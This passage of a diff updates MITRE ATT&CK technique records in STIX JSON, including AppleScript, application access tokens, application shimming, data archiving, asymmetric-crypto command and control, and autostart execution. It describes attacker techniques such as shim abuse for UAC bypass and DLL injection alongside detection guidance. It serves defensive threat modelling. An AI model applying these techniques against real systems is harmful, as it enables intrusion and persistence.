and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s\u00a0NSAppleScript\u00a0or\u00a0OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)", "id": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", "type": "attack-pattern", "kill_chain_phases": [ @@ -982,15 +1244,19 @@ "phase_name": "execution" } ], - "modified": "2020-04-14T13:28:17.696Z", + "modified": "2020-08-03T21:40:51.878Z", "created": "2020-03-09T14:07:54.329Z", - "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Phil Stokes, SentinelOne" + ], + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "User" ], - "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.", + "x_mitre_detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", "x_mitre_data_sources": [ + "API monitoring", "Process monitoring", "Process command-line parameters" ], @@ -1040,25 +1306,30 @@ "external_id": "T1550.001", "url": "https://attack.mitre.org/techniques/T1550/001" }, + { + "external_id": "CAPEC-593", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/593.html" + }, { "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/", "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019" }, { - "source_name": "okta", + "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen", - "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019." + "source_name": "okta" }, { - "source_name": "Microsoft Identity Platform Access 2019", + "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens", - "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019." + "source_name": "Microsoft Identity Platform Access 2019" }, { - "source_name": "Staaldraad Phishing with OAuth 2017", + "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/", - "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019." + "source_name": "Staaldraad Phishing with OAuth 2017" } ], "object_marking_refs": [ @@ -1079,9 +1350,9 @@ "phase_name": "lateral-movement" } ], - "modified": "2020-03-23T20:24:52.899Z", + "modified": "2020-09-16T19:40:02.024Z", "created": "2020-01-30T17:37:22.261Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_defense_bypassed": [ "System Access Controls" @@ -1183,19 +1454,9 @@ ] }, { - "created": "2017-05-31T21:30:56.776Z", - "modified": "2020-03-27T19:02:44.772Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "type": "attack-pattern", - "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Application Layer Protocol", - "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", "external_references": [ { "source_name": "mitre-attack", @@ -1208,17 +1469,20 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", + "name": "Application Layer Protocol", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } ], - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_network_requirements": true, - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "modified": "2020-10-21T16:35:45.986Z", + "created": "2017-05-31T21:30:56.776Z", + "x_mitre_version": "2.0", "x_mitre_data_sources": [ "DNS records", "Network protocol analysis", @@ -1227,7 +1491,14 @@ "Process use of network", "Process monitoring" ], - "x_mitre_version": "2.0" + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "x_mitre_network_requirements": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": false }, { "id": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", @@ -1282,7 +1553,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Application Shimming", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", "id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "type": "attack-pattern", "kill_chain_phases": [ @@ -1407,15 +1678,6 @@ ] }, { - "created": "2020-02-20T20:53:45.725Z", - "modified": "2020-03-29T18:27:31.040Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } - ], - "type": "attack-pattern", "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", "name": "Archive Collected Data", @@ -1435,6 +1697,15 @@ "source_name": "Wikipedia File Header Signatures" } ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "modified": "2020-10-21T16:36:55.831Z", + "created": "2020-02-20T20:53:45.725Z", "x_mitre_platforms": [ "Linux", "macOS", @@ -1546,6 +1817,22 @@ ] }, { + "created": "2020-02-20T21:01:25.428Z", + "modified": "2020-03-25T21:54:37.374Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.", + "name": "Archive via Utility", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -1573,38 +1860,38 @@ "source_name": "Wikipedia File Header Signatures" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Archive via Utility", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.", - "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } - ], - "modified": "2020-03-25T21:54:37.374Z", - "created": "2020-02-20T21:01:25.428Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", "x_mitre_data_sources": [ "Process monitoring", "Process command-line parameters", "File monitoring", "Binary file metadata" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { + "created": "2020-03-16T15:48:33.882Z", + "modified": "2020-03-30T00:37:16.593Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", + "name": "Asymmetric Cryptography", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -1627,25 +1914,11 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Asymmetric Cryptography", - "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", - "id": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "modified": "2020-03-30T00:37:16.593Z", - "created": "2020-03-16T15:48:33.882Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_data_sources": [ "Process monitoring", "Process use of network", @@ -1653,11 +1926,9 @@ "Netflow/Enclave netflow", "Packet capture" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "external_references": [ @@ -1985,19 +2256,9 @@ "x_mitre_version": "1.0" }, { - "created": "2017-05-31T21:31:27.985Z", - "modified": "2020-03-31T22:18:43.019Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "type": "attack-pattern", - "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Automated Collection", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.", "external_references": [ { "source_name": "mitre-attack", @@ -2005,28 +2266,38 @@ "external_id": "T1119" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.", + "name": "Automated Collection", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } ], - "x_mitre_system_requirements": [ - "Permissions to access directories and files that store information of interest." + "modified": "2020-03-31T22:18:43.019Z", + "created": "2017-05-31T21:31:27.985Z", + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File monitoring", + "Data loss prevention", + "Process command-line parameters" + ], + "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_permissions_required": [ + "User" ], "x_mitre_platforms": [ "Linux", "macOS", "Windows" ], - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", - "x_mitre_data_sources": [ - "File monitoring", - "Data loss prevention", - "Process command-line parameters" - ], - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": false + "x_mitre_system_requirements": [ + "Permissions to access directories and files that store information of interest." + ] }, { "id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", @@ -2050,13 +2321,14 @@ "phase_name": "exfiltration" } ], - "modified": "2020-03-11T13:58:08.219Z", + "modified": "2020-10-22T02:24:54.881Z", "created": "2017-05-31T21:30:29.458Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ], "x_mitre_network_requirements": true, "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.", @@ -2065,7 +2337,7 @@ "Process monitoring", "Process use of network" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", @@ -2299,14 +2571,14 @@ }, { "source_name": "VirusTotal FAQ", - "url": "https://www.virustotal.com/en/faq/ ", + "url": "https://www.virustotal.com/en/faq/", "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019." } ], "name": "Binary Padding", "id": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", "type": "attack-pattern", - "modified": "2020-02-05T15:08:05.575Z", + "modified": "2020-09-17T18:25:33.796Z", "created": "2017-05-31T21:30:22.096Z" }, { @@ -2321,6 +2593,11 @@ "source_name": "capec", "url": "https://capec.mitre.org/data/definitions/572.html" }, + { + "external_id": "CAPEC-655", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/655.html" + }, { "source_name": "ESET OceanLotus", "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", @@ -2333,7 +2610,7 @@ }, { "source_name": "VirusTotal FAQ", - "url": "https://www.virustotal.com/en/faq/ ", + "url": "https://www.virustotal.com/en/faq/", "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019." } ], @@ -2351,7 +2628,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T20:50:48.023Z", + "modified": "2020-09-17T18:25:33.828Z", "created": "2020-02-05T14:04:25.865Z", "x_mitre_contributors": [ "Martin Jirkal, ESET" @@ -2363,7 +2640,7 @@ "Malware reverse engineering" ], "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", @@ -2376,12 +2653,24 @@ ] }, { + "id": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)\u00a0 These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", + "name": "Boot or Logon Autostart Execution", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", "external_id": "T1547", "url": "https://attack.mitre.org/techniques/T1547" }, + { + "external_id": "CAPEC-564", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html" + }, { "url": "http://msdn.microsoft.com/en-us/library/aa376977", "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", @@ -2413,13 +2702,6 @@ "source_name": "TechNet Autoruns" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Boot or Logon Autostart Execution", - "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)\u00a0 These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", - "id": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "type": "attack-pattern", "kill_chain_phases": [ { @@ -2431,21 +2713,21 @@ "phase_name": "privilege-escalation" } ], - "modified": "2020-06-30T21:23:15.683Z", + "modified": "2020-10-09T16:05:36.772Z", "created": "2020-01-23T17:46:59.535Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", "x_mitre_permissions_required": [ "User", "Administrator", "root" ], - "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.1" }, { "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", @@ -2478,19 +2760,20 @@ "phase_name": "privilege-escalation" } ], - 